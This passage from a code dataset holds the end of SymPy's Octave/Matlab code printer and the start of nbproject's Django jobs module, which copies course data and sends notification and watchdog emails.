# generally a mapping to (argument_conditions, octave_function).
known_fcns_src2 = {
"Abs": "abs",
"ceiling": "ceil",
"conjugate": "conj",
"DiracDelta": "dirac",
"Heaviside": "heaviside",
}
class OctaveCodePrinter(CodePrinter):
"""
A printer to convert expressions to strings of Octave/Matlab code.
"""
printmethod = "_octave"
language = "Octave"
_operators = {
'and': '&',
'or': '|',
'not': '~',
}
_default_settings = {
'order': None,
'full_prec': 'auto',
'precision': 16,
'user_functions': {},
'human': True,
'contract': True,
'inline': True,
}
# Note: contract is for expressing tensors as loops (if True), or just
# assignment (if False). FIXME: this should be looked a more carefully
# for Octave.
def __init__(self, settings={}):
super(OctaveCodePrinter, self).__init__(settings)
self.known_functions = dict(zip(known_fcns_src1, known_fcns_src1))
self.known_functions.update(dict(known_fcns_src2))
userfuncs = settings.get('user_functions', {})
self.known_functions.update(userfuncs)
def _rate_index_position(self, p):
return p*5
def _get_statement(self, codestring):
return "%s;" % codestring
def _get_comment(self, text):
return "% {0}".format(text)
def _declare_number_const(self, name, value):
return "{0} = {1};".format(name, value)
def _format_code(self, lines):
return self.indent_code(lines)
def _traverse_matrix_indices(self, mat):
# Octave uses Fortran order (column-major)
rows, cols = mat.shape
return ((i, j) for j in range(cols) for i in range(rows))
def _get_loop_opening_ending(self, indices):
open_lines = []
close_lines = []
for i in indices:
# Octave arrays start at 1 and end at dimension
var, start, stop = map(self._print,
[i.label, i.lower + 1, i.upper + 1])
open_lines.append("for %s = %s:%s" % (var, start, stop))
close_lines.append("end")
return open_lines, close_lines
def _print_Mul(self, expr):
# print complex numbers nicely in Octave
if (expr.is_number and expr.is_imaginary and
expr.as_coeff_Mul()[0].is_integer):
return "%si" % self._print(-S.ImaginaryUnit*expr)
# cribbed from str.py
prec = precedence(expr)
c, e = expr.as_coeff_Mul()
if c < 0:
expr = _keep_coeff(-c, e)
sign = "-"
else:
sign = ""
a = [] # items in the numerator
b = [] # items that are in the denominator (if any)
if self.order not in ('old', 'none'):
args = expr.as_ordered_factors()
else:
# use make_args in case expr was something like -x -> x
args = Mul.make_args(expr)
# Gather args for numerator/denominator
for item in args:
if (item.is_commutative and item.is_Pow and item.exp.is_Rational
and item.exp.is_negative):
if item.exp != -1:
b.append(Pow(item.base, -item.exp, evaluate=False))
else:
b.append(Pow(item.base, -item.exp))
elif item.is_Rational and item is not S.Infinity:
if item.p != 1:
a.append(Rational(item.p))
if item.q != 1:
b.append(Rational(item.q))
else:
a.append(item)
a = a or [S.One]
a_str = [self.parenthesize(x, prec) for x in a]
b_str = [self.parenthesize(x, prec) for x in b]
# from here it differs from str.py to deal with "*" and ".*"
def multjoin(a, a_str):
# here we probably are assuming the constants will come first
r = a_str[0]
for i in range(1, len(a)):
mulsym = '*' if a[i-1].is_number else '.*'
r = r + mulsym + a_str[i]
return r
if len(b) == 0:
return sign + multjoin(a, a_str)
elif len(b) == 1:
divsym = '/' if b[0].is_number else './'
return sign + multjoin(a, a_str) + divsym + b_str[0]
else:
divsym = '/' if all([bi.is_number for bi in b]) else './'
return (sign + multjoin(a, a_str) +
divsym + "(%s)" % multjoin(b, b_str))
def _print_Pow(self, expr):
powsymbol = '^' if all([x.is_number for x in expr.args]) else '.^'
PREC = precedence(expr)
if expr.exp == S.Half:
return "sqrt(%s)" % self._print(expr.base)
if expr.is_commutative:
if expr.exp == -S.Half:
sym = '/' if expr.base.is_number else './'
return "1" + sym + "sqrt(%s)" % self._print(expr.base)
if expr.exp == -S.One:
sym = '/' if expr.base.is_number else './'
return "1" + sym + "%s" % self.parenthesize(expr.base, PREC)
return '%s%s%s' % (self.parenthesize(expr.base, PREC), powsymbol,
self.parenthesize(expr.exp, PREC))
def _print_MatPow(self, expr):
PREC = precedence(expr)
return '%s^%s' % (self.parenthesize(expr.base, PREC),
self.parenthesize(expr.exp, PREC))
def _print_Pi(self, expr):
return 'pi'
def _print_ImaginaryUnit(self, expr):
return "1i"
def _print_Exp1(self, expr):
return "exp(1)"
def _print_GoldenRatio(self, expr):
# FIXME: how to do better, e.g., for octave_code(2*GoldenRatio)?
#return self._print((1+sqrt(S(5)))/2)
return "(1+sqrt(5))/2"
def _print_NumberSymbol(self, expr):
if self._settings["inline"]:
return self._print(expr.evalf(self._settings["precision"]))
else:
# assign to a variable, perhaps more readable for longer program
return super(OctaveCodePrinter, self)._print_NumberSymbol(expr)
def _print_Assignment(self, expr):
from sympy.functions.elementary.piecewise import Piecewise
from sympy.tensor.indexed import IndexedBase
# Copied from codeprinter, but remove special MatrixSymbol treatment
lhs = expr.lhs
rhs = expr.rhs
# We special case assignments that take multiple lines
if not self._settings["inline"] and isinstance(expr.rhs, Piecewise):
# Here we modify Piecewise so each expression is now
# an Assignment, and then continue on the print.
expressions = []
conditions = []
for (e, c) in rhs.args:
expressions.append(Assignment(lhs, e))
conditions.append(c)
temp = Piecewise(*zip(expressions, conditions))
return self._print(temp)
if self._settings["contract"] and (lhs.has(IndexedBase) or
rhs.has(IndexedBase)):
# Here we check if there is looping to be done, and if so
# print the required loops.
return self._doprint_loops(rhs, lhs)
else:
lhs_code = self._print(lhs)
rhs_code = self._print(rhs)
return self._get_statement("%s = %s" % (lhs_code, rhs_code))
def _print_Infinity(self, expr):
return 'inf'
def _print_NegativeInfinity(self, expr):
return '-inf'
def _print_NaN(self, expr):
return 'NaN'
def _print_list(self, expr):
return '{' + ', '.join(self._print(a) for a in expr) + '}'
_print_tuple = _print_list
_print_Tuple = _print_list
def _print_BooleanTrue(self, expr):
return "true"
def _print_BooleanFalse(self, expr):
return "false"
def _print_bool(self, expr):
return str(expr).lower()
# Could generate quadrature code for definite Integrals?
#_print_Integral = _print_not_supported
def _print_MatrixBase(self, A):
# Handle zero dimensions:
if (A.rows, A.cols) == (0, 0):
return '[]'
elif A.rows == 0 or A.cols == 0:
return 'zeros(%s, %s)' % (A.rows, A.cols)
elif (A.rows, A.cols) == (1, 1):
# Octave does not distinguish between scalars and 1x1 matrices
return self._print(A[0, 0])
elif A.rows == 1:
return "[%s]" % A.table(self, rowstart='', rowend='', colsep=' ')
elif A.cols == 1:
# note .table would unnecessarily equispace the rows
return "[%s]" % "; ".join([self._print(a) for a in A])
return "[%s]" % A.table(self, rowstart='', rowend='',
rowsep=';\n', colsep=' ')
def _print_SparseMatrix(self, A):
from sympy.matrices import Matrix
L = A.col_list();
# make row vectors of the indices and entries
I = Matrix([[k[0] + 1 for k in L]])
J = Matrix([[k[1] + 1 for k in L]])
AIJ = Matrix([[k[2] for k in L]])
return "sparse(%s, %s, %s, %s, %s)" % (self._print(I), self._print(J),
self._print(AIJ), A.rows, A.cols)
# FIXME: Str/CodePrinter could define each of these to call the _print
# method from higher up the class hierarchy (see _print_NumberSymbol).
# Then subclasses like us would not need to repeat all this.
_print_Matrix = \
_print_DenseMatrix = \
_print_MutableDenseMatrix = \
_print_ImmutableMatrix = \
_print_ImmutableDenseMatrix = \
_print_MatrixBase
_print_MutableSparseMatrix = \
_print_ImmutableSparseMatrix = \
_print_SparseMatrix
def _print_MatrixElement(self, expr):
return self._print(expr.parent) + '(%s, %s)'%(expr.i+1, expr.j+1)
def _print_MatrixSlice(self, expr):
def strslice(x, lim):
l = x[0] + 1
h = x[1]
step = x[2]
lstr = self._print(l)
hstr = 'end' if h == lim else self._print(h)
if step == 1:
if l == 1 and h == lim:
return ':'
if l == h:
return lstr
else:
return lstr + ':' + hstr
else:
return ':'.join((lstr, self._print(step), hstr))
return (self._print(expr.parent) + '(' +
strslice(expr.rowslice, expr.parent.shape[0]) + ', ' +
strslice(expr.colslice, expr.parent.shape[1]) + ')')
def _print_Indexed(self, expr):
inds = [ self._print(i) for i in expr.indices ]
return "%s(%s)" % (self._print(expr.base.label), ", ".join(inds))
def _print_Idx(self, expr):
return self._print(expr.label)
def _print_Identity(self, expr):
return "eye(%s)" % self._print(expr.shape[0])
def _print_hankel1(self, expr):
return "besselh(%s, 1, %s)" % (self._print(expr.order),
self._print(expr.argument))
def _print_hankel2(self, expr):
return "besselh(%s, 2, %s)" % (self._print(expr.order),
self._print(expr.argument))
# Note: as of 2015, Octave doesn't have spherical Bessel functions
def _print_jn(self, expr):
from sympy.functions import sqrt, besselj
x = expr.argument
expr2 = sqrt(S.Pi/(2*x))*besselj(expr.order + S.Half, x)
return self._print(expr2)
def _print_yn(self, expr):
from sympy.functions import sqrt, bessely
x = expr.argument
expr2 = sqrt(S.Pi/(2*x))*bessely(expr.order + S.Half, x)
return self._print(expr2)
def _print_airyai(self, expr):
return "airy(0, %s)" % self._print(expr.args[0])
def _print_airyaiprime(self, expr):
return "airy(1, %s)" % self._print(expr.args[0])
def _print_airybi(self, expr):
return "airy(2, %s)" % self._print(expr.args[0])
def _print_airybiprime(self, expr):
return "airy(3, %s)" % self._print(expr.args[0])
def _print_Piecewise(self, expr):
if expr.args[-1].cond != True:
# We need the last conditional to be a True, otherwise the resulting
# function may not return a result.
raise ValueError("All Piecewise expressions must contain an "
"(expr, True) statement to be used as a default "
"condition. Without one, the generated "
"expression may not evaluate to anything under "
"some condition.")
lines = []
if self._settings["inline"]:
# Express each (cond, expr) pair in a nested Horner form:
# (condition) .* (expr) + (not cond) .* (<others>)
# Expressions that result in multiple statements won't work here.
ecpairs = ["({0}).*({1}) + (~({0})).*(".format
(self._print(c), self._print(e))
for e, c in expr.args[:-1]]
elast = "%s" % self._print(expr.args[-1].expr)
pw = " ...\n".join(ecpairs) + elast + ")"*len(ecpairs)
# Note: current need these outer brackets for 2*pw. Would be
# nicer to teach parenthesize() to do this for us when needed!
return "(" + pw + ")"
else:
for i, (e, c) in enumerate(expr.args):
if i == 0:
lines.append("if (%s)" % self._print(c))
elif i == len(expr.args) - 1 and c == True:
lines.append("else")
else:
lines.append("elseif (%s)" % self._print(c))
code0 = self._print(e)
lines.append(code0)
if i == len(expr.args) - 1:
lines.append("end")
return "\n".join(lines)
def indent_code(self, code):
"""Accepts a string of code or a list of code lines"""
# code mostly copied from ccode
if isinstance(code, string_types):
code_lines = self.indent_code(code.splitlines(True))
return ''.join(code_lines)
tab = " "
inc_regex = ('^function ', '^if ', '^elseif ', '^else$', '^for ')
dec_regex = ('^end$', '^elseif ', '^else$')
# pre-strip left-space from the code
code = [ line.lstrip(' \t') for line in code ]
increase = [ int(any([search(re, line) for re in inc_regex]))
for line in code ]
decrease = [ int(any([search(re, line) for re in dec_regex]))
for line in code ]
pretty = []
level = 0
for n, line in enumerate(code):
if line == '' or line == '\n':
pretty.append(line)
continue
level -= decrease[n]
pretty.append("%s%s" % (tab*level, line))
level += increase[n]
return pretty
def octave_code(expr, assign_to=None, **settings):
r"""Converts `expr` to a string of Octave (or Matlab) code.
The string uses a subset of the Octave language for Matlab compatibility.
Parameters
==========
expr : Expr
A sympy expression to be converted.
assign_to : optional
When given, the argument is used as the name of the variable to which
the expression is assigned. Can be a string, ``Symbol``,
``MatrixSymbol``, or ``Indexed`` type. This can be helpful for
expressions that generate multi-line statements.
precision : integer, optional
The precision for numbers such as pi [default=16].
user_functions : dict, optional
A dictionary where keys are ``FunctionClass`` instances and values are
their string representations. Alternatively, the dictionary value can
be a list of tuples i.e. [(argument_test, cfunction_string)]. See
below for examples.
human : bool, optional
If True, the result is a single string that may contain some constant
declarations for the number symbols. If False, the same information is
returned in a tuple of (symbols_to_declare, not_supported_functions,
code_text). [default=True].
contract: bool, optional
If True, ``Indexed`` instances are assumed to obey tensor contraction
rules and the corresponding nested loops over indices are generated.
Setting contract=False will not generate loops, instead the user is
responsible to provide values for the indices in the code.
[default=True].
inline: bool, optional
If True, we try to create single-statement code instead of multiple
statements. [default=True].
Examples
========
>>> from sympy import octave_code, symbols, sin, pi
>>> x = symbols('x')
>>> octave_code(sin(x).series(x).removeO())
'x.^5/120 - x.^3/6 + x'
>>> from sympy import Rational, ceiling, Abs
>>> x, y, tau = symbols("x, y, tau")
>>> octave_code((2*tau)**Rational(7, 2))
'8*sqrt(2)*tau.^(7/2)'
Note that element-wise (Hadamard) operations are used by default between
symbols. This is because its very common in Octave to write "vectorized"
code. It is harmless if the values are scalars.
>>> octave_code(sin(pi*x*y), assign_to="s")
's = sin(pi*x.*y);'
If you need a matrix product "*" or matrix power "^", you can specify the
symbol as a ``MatrixSymbol``.
>>> from sympy import Symbol, MatrixSymbol
>>> n = Symbol('n', integer=True, positive=True)
>>> A = MatrixSymbol('A', n, n)
>>> octave_code(3*pi*A**3)
'(3*pi)*A^3'
This class uses several rules to decide which symbol to use a product.
Pure numbers use "*", Symbols use ".*" and MatrixSymbols use "*".
A HadamardProduct can be used to specify componentwise multiplication ".*"
of two MatrixSymbols. There is currently there is no easy way to specify
scalar symbols, so sometimes the code might have some minor cosmetic
issues. For example, suppose x and y are scalars and A is a Matrix, then
while a human programmer might write "(x^2*y)*A^3", we generate:
>>> octave_code(x**2*y*A**3)
'(x.^2.*y)*A^3'
Matrices are supported using Octave inline notation. When using
``assign_to`` with matrices, the name can be specified either as a string
or as a ``MatrixSymbol``. The dimenions must align in the latter case.
>>> from sympy import Matrix, MatrixSymbol
>>> mat = Matrix([[x**2, sin(x), ceiling(x)]])
>>> octave_code(mat, assign_to='A')
'A = [x.^2 sin(x) ceil(x)];'
``Piecewise`` expressions are implemented with logical masking by default.
Alternatively, you can pass "inline=False" to use if-else conditionals.
Note that if the ``Piecewise`` lacks a default term, represented by
``(expr, True)`` then an error will be thrown. This is to prevent
generating an expression that may not evaluate to anything.
>>> from sympy import Piecewise
>>> pw = Piecewise((x + 1, x > 0), (x, True))
>>> octave_code(pw, assign_to=tau)
'tau = ((x > 0).*(x + 1) + (~(x > 0)).*(x));'
Note that any expression that can be generated normally can also exist
inside a Matrix:
>>> mat = Matrix([[x**2, pw, sin(x)]])
>>> octave_code(mat, assign_to='A')
'A = [x.^2 ((x > 0).*(x + 1) + (~(x > 0)).*(x)) sin(x)];'
Custom printing can be defined for certain types by passing a dictionary of
"type" : "function" to the ``user_functions`` kwarg. Alternatively, the
dictionary value can be a list of tuples i.e., [(argument_test,
cfunction_string)]. This can be used to call a custom Octave function.
>>> from sympy import Function
>>> f = Function('f')
>>> g = Function('g')
>>> custom_functions = {
... "f": "existing_octave_fcn",
... "g": [(lambda x: x.is_Matrix, "my_mat_fcn"),
... (lambda x: not x.is_Matrix, "my_fcn")]
... }
>>> mat = Matrix([[1, x]])
>>> octave_code(f(x) + g(x) + g(mat), user_functions=custom_functions)
'existing_octave_fcn(x) + my_fcn(x) + my_mat_fcn([1 x])'
Support for loops is provided through ``Indexed`` types. With
``contract=True`` these expressions will be turned into loops, whereas
``contract=False`` will just print the assignment expression that should be
looped over:
>>> from sympy import Eq, IndexedBase, Idx, ccode
>>> len_y = 5
>>> y = IndexedBase('y', shape=(len_y,))
>>> t = IndexedBase('t', shape=(len_y,))
>>> Dy = IndexedBase('Dy', shape=(len_y-1,))
>>> i = Idx('i', len_y-1)
>>> e = Eq(Dy[i], (y[i+1]-y[i])/(t[i+1]-t[i]))
>>> octave_code(e.rhs, assign_to=e.lhs, contract=False)
'Dy(i) = (y(i + 1) - y(i))./(t(i + 1) - t(i));'
"""
return OctaveCodePrinter(settings).doprint(expr, assign_to)
def print_octave_code(expr, **settings):
"""Prints the Octave (or Matlab) representation of the given expression.
See `octave_code` for the meaning of the optional arguments.
"""
print(octave_code(expr, **settings))
| bsd-3-clause |
Lsquared13/nbproject | apps/base/jobs.py | 1 | 19665 | """
jobs.py - base notification routines
Author
Sacha Zyto <sacha@csail.mit.edu>
License
Copyright (c) 2010-2012 Massachusetts Institute of Technology.
MIT License (cf. MIT-LICENSE.txt or http://www.opensource.org/licenses/mit-license.php)
"""
import sys,os
import datetime
if "." not in sys.path:
sys.path.append(".")
if "DJANGO_SETTINGS_MODULE" not in os.environ or __name__=="__main__":
os.environ['DJANGO_SETTINGS_MODULE'] = 'nbsite.settings'
from django.conf import settings
import base.utils as utils, base.models as M
from django.template.loader import render_to_string
from django.core.mail import EmailMessage
from django.db.models import Max
from django.db.models.deletion import Collector
from django.db.utils import IntegrityError
from django.db import transaction
VISIBILITY = {1: "Myself", 2: "Staff", 3: "Class"}
pending_inserts = []
def extract_obj(o, from_class, cut_at):
#inspired from from http://stackoverflow.com/a/2315053/768104
extracted = {}
print "pulling objects related to %s" % (o,)
links = [rel.get_accessor_name() for rel in o._meta.get_all_related_objects()]
for link in links:
rel_objects = getattr(o, link).all()
for ro in rel_objects:
classname = ro.__class__.__name__
if classname not in extracted:
extracted[classname]={}
if ro.id not in extracted[classname]:
extracted[classname][ro.id]=1
extract_obj(ro, classname, cut_at)
from django.db.models.fields.related import ForeignKey
def duplicate(objs, using_src, using_dest, special_handlers):
#adapted from http://stackoverflow.com/a/6064096/768104
collector = Collector(using_src)
collector.collect(objs)
collector.sort()
related_models = collector.data.keys()
duplicate_order = reversed(related_models)
extracted = {}
for model in duplicate_order:
# Find all FKs on model that point to a related_model.
fks = []
for f in model._meta.fields:
if isinstance(f, ForeignKey) and f.rel.to not in related_models:
fks.append(f)
# Replace each `sub_obj` with a duplicate.
if model not in collector.data:
continue
sub_objects = collector.data[model]
for obj in sub_objects:
for fk in fks:
rel_obj = getattr(obj, fk.name)
rel_cls = rel_obj.__class__
if rel_cls not in extracted:
extracted[rel_cls]={}
if rel_obj is not None and rel_obj.id not in extracted[rel_cls]:
extracted[rel_cls][rel_obj.id]=True
rel_obj.save(using=using_dest)
#print "-> saved related object %s" % (rel_obj,)
#now ready to insert obj:
if model not in extracted:
extracted[model]={}
if obj is not None and obj.id not in extracted[model]:
extracted[model][obj.id]=True
try:
obj.save(using=using_dest)
except IntegrityError as e:
pending_inserts.append(obj)
print "%s done TOTAL objects written: %s " % (model.__name__, sum([len(extracted[i]) for i in extracted]))
do_pending_inserts(using_dest)
def do_pending_inserts(using):
global pending_inserts
new_pending = []
for o in pending_inserts:
try:
o.save(using=using)
except IntegrityError as e:
new_pending.append(o)
def do_extract(t_args):
objs = [(M.Ensemble, 237), ]
objs_src = [o[0].objects.using("default").get(pk=o[1]) for o in objs]
def insert_parent_comments(o, using_dest):
ancestors = []
c = o.parent
while c is not None:
ancestors.append(c)
c = c.parent
for c2 in reversed(ancestors):
c2.save(using=using_dest)
print "Special Comment case: inserted %s parent comments" % (len(ancestors),)
duplicate(objs_src, "default", "sel", {M.Comment: insert_parent_comments})
objs_dest = [o[0].objects.using("sel").get(pk=o[1]) for o in objs]
def do_dumpensemble(t_args):
ensemble_ids = (3756, 3840) #Add ensembles here.
from django.core import serializers
Serializer = serializers.get_serializer("json")
serializer = Serializer()
f = open("ensembles.json", "w");
ensembles = M.Ensemble.objects.filter(id__in=ensemble_ids).distinct()
serializer.serialize(ensembles, indent=1, stream=f)
o = M.User.objects.filter(membership__ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f, fields=("id", "firstname", "lastname", "email", "guest", "valid"))
o = M.Folder.objects.filter(ownership__ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f)
o = M.Section.objects.filter(membership__ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f)
o = M.Membership.objects.filter(ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f)
o = M.Source.objects.filter(ownership__ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f)
o = M.HTML5Info.objects.filter(source__ownership__ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f)
o = M.Ownership.objects.filter(ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f)
o = M.Location.objects.filter(ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f)
o = M.HTML5Location.objects.filter(location__ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f)
o = M.Comment.objects.filter(location__ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f)
o = M.ThreadMark.objects.filter(comment__location__ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f)
o = M.ReplyRating.objects.filter(comment__location__ensemble__in=ensembles).distinct()
serializer.serialize(o, indent=1, stream=f)
f.close()
def do_watchdog(t_args):
when = datetime.datetime.now()
print """
---------------------- WATCHDOG NOTIFICATIONS FOR %s -----------------""" % (when, )
do_watchdog_longpdfprocess()
do_watchdog_notstartedpdfprocess()
print "--------------- END OF WATCHDOG NOTIFICATIONS FOR %s -----------------" % (when, )
def do_immediate(t_args):
when = datetime.datetime.now()
print """
---------------------- IMMEDIATE NOTIFICATIONS FOR %s -----------------""" % (when, )
do_auth_immediate()
do_reply_immediate()
##do_answerplease_immediate()
##do_unclear_immediate()
do_all_immediate()
print "--------------- END OF IMMEDIATE NOTIFICATIONS FOR %s -----------------" % (when, )
def do_digest(t_args):
when = datetime.datetime.now()
print """
---------------------- DIGEST NOTIFICATIONS FOR %s -----------------""" % (when, )
#do_auth_digest()
#do_reply_digest()
##do_answerplease_digest()
##do_unclear_digest()
print "--------------- END OF DIGEST NOTIFICATIONS FOR %s -----------------" % (when, )
def do_auth_immediate():
latestCtime = M.Comment.objects.all().aggregate(Max("ctime"))["ctime__max"]
latestNotif = M.Notification.objects.get(type="auth_immediate")
setting_qry = "select coalesce(value, (select value from base_defaultsetting where name='email_confirmation_author')) from base_user u left join base_usersetting us on us.user_id=u.id and us.setting_id=(select id from base_defaultsetting where name='email_confirmation_author') where u.id=base_comment.author_id"
comments = M.Comment.objects.extra(select={"setting_value": setting_qry}).filter(ctime__gt=latestNotif.atime)
V={"reply_to": settings.SMTP_REPLY_TO, "protocol": settings.PROTOCOL, "hostname": settings.HOSTNAME }
for c in (o for o in comments if o.setting_value==2): #django doesn't let us filter by extra parameters yet
msg = render_to_string("email/msg_auth_immediate",{"V":V, "c": c, "visibility": VISIBILITY[c.type]})
email = EmailMessage("You've posted a new note on NB...",
msg,
settings.EMAIL_FROM,
(c.author.email, ),
(settings.EMAIL_BCC, ))
email.send()
try:
print msg
except UnicodeEncodeError:
print "not displaying msg b/c of unicode issues"
latestNotif.atime = latestCtime
latestNotif.save()
def do_all_immediate():
#send email to for all new msg in group where I'm an admin
latestCtime = M.Comment.objects.all().aggregate(Max("ctime"))["ctime__max"]
latestNotif = M.Notification.objects.get(type="all_immediate")
comments = M.Comment.objects.filter(ctime__gt=latestNotif.atime, type__gt=1)
V={"reply_to": settings.SMTP_REPLY_TO, "protocol": settings.PROTOCOL, "hostname": settings.HOSTNAME }
setting_qry = "select coalesce(value, (select value from base_defaultsetting where name='email_confirmation_all')) from base_user u left join base_usersetting us on us.user_id=u.id and us.setting_id=(select id from base_defaultsetting where name='email_confirmation_all') where u.id=base_membership.user_id"
for c in comments:
memberships = M.Membership.objects.extra(select={"setting_value": setting_qry}).filter(ensemble=c.location.ensemble, admin=True).exclude(user=c.author) #we don't want to send a notice to a faculty for a comment that he wrote !
for m in (o for o in memberships if o.setting_value==2): #django doesn't let us filter by extra parameters yet
msg = render_to_string("email/msg_all_immediate",{"V":V, "c": c, "visibility": VISIBILITY[c.type], "m": m})
email = EmailMessage("%s %s just wrote a comment on %s" % (c.author.firstname, c.author.lastname, c.location.source.title),
msg,
settings.EMAIL_FROM,
(m.user.email, ),
(settings.EMAIL_BCC, ))
email.send()
try:
print msg
except UnicodeEncodeError:
print "not displaying msg b/c of unicode issues"
latestNotif.atime = latestCtime
latestNotif.save()
def do_reply_immediate():
latestCtime = M.Comment.objects.all().aggregate(Max("ctime"))["ctime__max"]
latestNotif = M.Notification.objects.get(type="reply_immediate")
setting_qry = "select coalesce(value, (select value from base_defaultsetting where name='email_confirmation_reply_author')) from base_user u left join base_usersetting us on us.user_id=u.id and us.setting_id=(select id from base_defaultsetting where name='email_confirmation_reply_author') where u.id=base_comment.author_id"
recentComments = M.Comment.objects.filter(ctime__gt=latestNotif.atime, type=3, parent__type=3)
V={"reply_to": settings.SMTP_REPLY_TO, "protocol": settings.PROTOCOL, "hostname": settings.HOSTNAME }
#TODO: This is ugly: I'd like to keep this vectorized at the DB level, but I don't know how to do it in django, hence the double forloop.
for rc in recentComments:
comments = M.Comment.objects.extra(select={"setting_value": setting_qry}).filter(location=rc.location).exclude(author=rc.author)
emailed_uids=[] #bookkeeping in order not to email N times someone who posted N posts in a thread !
for c in (o for o in comments if o.setting_value==2): #django doesn't let us filter by extra parameters yet
if c.author_id not in emailed_uids:
emailed_uids.append(c.author_id)
msg = render_to_string("email/msg_reply_immediate",{"V": V, "c":c, "rc":rc})
email = EmailMessage("New reply on %s" % (c.location.source.title,),
msg, settings.EMAIL_FROM, (c.author.email, ),(settings.EMAIL_BCC, ))
email.send()
try:
print msg
except UnicodeEncodeError:
print "not displaying msg b/c of unicode issues"
latestNotif.atime = latestCtime
latestNotif.save()
def do_watchdog_longpdfprocess():
minutes_ago = datetime.datetime.now() - datetime.timedelta(0, 10*60) # 10 minutes ago
objs = M.Processqueue.objects.filter(started__isnull=False, completed__isnull=True, started__lt=minutes_ago)
if objs.count() > 0:
o=objs[0]
V = {"processtime": datetime.datetime.now()-o.started, "o": o, "hostname": settings.HOSTNAME }
msg = render_to_string("email/msg_watchdog_longpdf",V)
recipients = [i[1] for i in settings.ADMINS]
email = EmailMessage("NB Watchdog warning: long pdf process",
msg,
settings.EMAIL_WATCHDOG,
recipients,
(settings.EMAIL_BCC, ))
email.send()
print msg
def do_watchdog_notstartedpdfprocess():
minutes_ago = datetime.datetime.now() - datetime.timedelta(0, 20*60) # 20 minutes ago
objs = M.Processqueue.objects.filter(started__isnull=True, submitted__lt=minutes_ago)
#rows = DB.getRows("select p.id_source, s.title, now()-p.submitted from nb2_processqueue p left join source s on s.id=p.id_source where now()-p.submitted>'60 minutes' and p.started is null", ());
if objs.count() > 0:
V = {"objs": objs, "hostname": settings.HOSTNAME }
msg = render_to_string("email/msg_watchdog_notstartedpdf",V)
recipients = [i[1] for i in settings.ADMINS]
email = EmailMessage("NB Watchdog warning: some pdf processes haven't started yet",
msg,
settings.EMAIL_WATCHDOG,
recipients,
(settings.EMAIL_BCC, ))
email.send()
print msg
def do_auth_digest():
latestCtime = DB.getVal("select max(ctime) from nb2_comment", ());
rows = DB.getRows("""
select v.id, v.id_location, v.id_author, v.email, v.id_type, v.title, v.body, v.ctime, e.name, us.value as user_setting, ds.value as default_setting
from nb2_v_comment v left join nb2_user_settings us on id_author=us.id_user and us.name='email_confirmation_author' and us.valid=1, ensemble e, nb2_default_settings ds
where
e.id= v.id_ensemble and
v.ctime > (select atime from nb2_latest_notifications where type='auth_digest')
and ds.name='email_confirmation_author'
and ( us.value = 1 or (us.value is null and ds.value=1))
order by v.ctime""", ())
msg_by_email = {}
for r2 in rows:
i=1
V={"reply_to": settings.SMTP_REPLY_TO, "protocol": settings.PROTOCOL, "hostname": settings.HOSTNAME }
V["id_location"] = r2[i];i+=1
V["id_author"] = r2[i];i+=1
V["email"] = r2[i];i+=1
#V["visibility"];
i+=1
V["file"] = r2[i];i+=1
V["body"] = r2[i];i+=1
V["ctime"]= r2[i];i+=1
V["ensemble"] = r2[i];i+=1
if V["email"] not in msg_by_email:
msg_by_email[V["email"]]=[]
msg_by_email[V["email"]].append(V)
DB.doTransaction("update nb2_latest_notifications set atime = ? where type='auth_digest'", (latestCtime,))
for email in msg_by_email:
vals = msg_by_email[email]
msg = MSG_AUTH_DIGEST_HEADER % vals[0]
for V in vals:
msg+=MSG_AUTH_DIGEST_BODY % V
msg+=MSG_AUTH_DIGEST_FOOTER
if settings.DO_EMAIL:
session = smtplib.SMTP(settings.SMTP_SERVER)
recipients = [email]
if CC_ME:
recipients.append(CC_EMAIL)
smtpresult = session.sendmail(settings.SMTP_USER, recipients, msg)
try:
print msg
except UnicodeEncodeError:
print "not displaying msg b/c of unicode issues"
def do_reply_digest():
latestCtime = DB.getVal("select max(ctime) from nb2_comment", ());
rows = DB.getRows("""
select v.id_location, v.email, i.title, i.body, i.ctime
from nb2_v_comment v left join nb2_user_settings us on v.id_author=us.id_user and us.name='email_confirmation_reply_author' and us.valid=1,nb2_v_digest_class i, nb2_default_settings ds
where v.id_location = i.id_location and
v.id_author != i.id_author and
ds.name='email_confirmation_reply_author' and
( us.value = 1 or (us.value is null and ds.value=1))""", ())
msg_by_email = {}
for r2 in rows:
i=0
V={"reply_to": settings.SMTP_REPLY_TO, "protocol": settings.PROTOCOL, "hostname": settings.HOSTNAME }
V["id_location"] = r2[i];i+=1
V["email"] = r2[i];i+=1
V["file"] = r2[i];i+=1
V["body"] = r2[i];i+=1
V["ctime"]= r2[i];i+=1
if V["email"] not in msg_by_email:
msg_by_email[V["email"]]=[]
msg_by_email[V["email"]].append(V)
DB.doTransaction("update nb2_latest_notifications set atime = ? where type='reply_digest'", (latestCtime,))
for email in msg_by_email:
locations = []
vals = msg_by_email[email]
msg = MSG_REPLY_DIGEST_HEADER % vals[0]
for V in vals:
if V["id_location"] not in locations:
locations.append(V["id_location"])
msg+=MSG_REPLY_DIGEST_BODY % V
msg+=MSG_REPLY_DIGEST_FOOTER
if settings.DO_EMAIL:
session = smtplib.SMTP(settings.SMTP_SERVER)
recipients = [email]
if CC_ME:
recipients.append(CC_EMAIL)
smtpresult = session.sendmail(settings.SMTP_USER, recipients, msg)
try:
print msg
except UnicodeEncodeError:
print "not displaying msg b/c of unicode issues"
def do_upgrade(t_args):
# We will see if we need to upgrade and call
# the appropriate upgrade metods when needed
#u = M.User.objects.all()[0]
#if u.password != None and u.saltedhash == None:
do_auth_salt_upgrade()
@transaction.commit_on_success
def do_auth_salt_upgrade():
# This method does not handle database migrations, only schema
# upgrades. Make sure to run the following query before doing
# upgrade:
#
# ALTER TABLE base_user
# ADD COLUMN salt varchar(32),
# ADD COLUMN saltedhash varchar(128);
#
# The query can be run from manage.py dbshell
usercount = 0
print "begin update..."
